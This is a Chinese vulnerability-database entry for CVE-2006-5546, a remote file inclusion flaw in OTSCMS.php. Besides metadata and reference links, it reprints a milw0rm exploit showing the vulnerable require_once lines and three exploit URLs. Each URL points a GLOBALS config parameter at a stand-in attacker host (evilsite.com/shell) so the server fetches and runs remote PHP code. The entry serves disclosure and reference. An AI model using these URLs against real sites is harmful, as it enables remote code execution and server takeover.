OTSCMS 'OTSCMS.PHP'多个远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111365 漏洞类型 输入验证
发布时间 2006-10-23 更新时间 2006-10-30
CVE编号 CVE-2006-5546 CNNVD-ID CNNVD-200610-457
漏洞平台 PHP CVSS评分 5.1
|漏洞来源
https://www.exploit-db.com/exploits/2622
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-457
|漏洞详情
OpenTibiaServerContentManagementSystem(OTSCMS)1.3.0至1.4.1版本的OTSCMS/OTSCMS.php中存在PHP远程文件包含漏洞,远程攻击者可以通过GLOBALS[config][otscms][directories][classes]参数的URL执行任意PHP代码。
|漏洞EXP
**********************************************************************************************************
                                       *                       *
			               * Coding 4 Fun (c4f.pl) *
			               *                       *
			               *************************

* OTSCMS <= 2.1.3 by Wrzasq (www.otscms.com) ; 

* Class = Remote File Inclusion ;
 
* Download = http://sourceforge.net/project/showfiles.php?group_id=145557 ;

* Found by = GregStar (gregstar{at}c4f{dot}pl) ;

-------------------------------------------------------------------------------------------------------------------

OTSCMS 2.0.0 - 2.1.3 :

- Vulnerable Code:

 require_once($GLOBALS['config']['directories']['classes'] . $class . '.php');

- Exploit:

http://[target]/[path]/OTSCMS.php?GLOBALS[config][directories][classes]=http://evilsite.com/shell?

-------------------------------------------------------------------------------------------------------------------

OTSCMS 1.3.0 - 1.4.1 :

- Vulnerable Code:

 require_once($GLOBALS['config']['otscms']['directories']['classes'] . $class . '.php');


- Exploit:

http://[target]/[path]/OTSCMS.php?GLOBALS[config][otscms][directories][classes]=http://evilsite.com/shell?

-------------------------------------------------------------------------------------------------------------------

OTSCMS 1.0.0 - 1.0.3 :

- Vulnerable Code:

 require_once($GLOBALS['config']['otscms']['directories']['includes'].'OTSCMSException.class.php');

- Exploit:

http://[target]/[path]/OTSCMS.php?GLOBALS[config][otscms][directories][includes]=http://evilsite.com/shell?

------------------------------------------------------------------------------------------------------------------

Gr33tz:  sASAn,marcel3miasto,masS,kaziq,Abi,kociaq,RFL,d3m0n,java,kw@ch and for all friends.
**************************************************************************************************************

Notes:
Only works with php5 and 2.1.4 should also be vulnerable using OTSCMS.php with the config variable.
/str0ke

# milw0rm.com [2006-10-23]
|参考资料

来源:BID
名称:20694
链接:http://www.securityfocus.com/bid/20694
来源:SECUNIA
名称:22577
链接:http://secunia.com/advisories/22577
来源:XF
名称:otscms-otscms-file-include(29719)
链接:http://xforce.iss.net/xforce/xfdb/29719
来源:MILW0RM
名称:2622
链接:http://www.milw0rm.com/exploits/2622
来源:VIM
名称:20061025CONFIRM:OTSCMSfileinclusions-PHP5__autoload
链接:http://attrition.org/pipermail/vim/2006-October/001096.html
来源:VUPEN
名称:ADV-2006-4180
链接:http://www.frsirt.com/english/advisories/2006/4180
来源:MILW0RM
名称:2622
链接:http://milw0rm.com/exploits/2622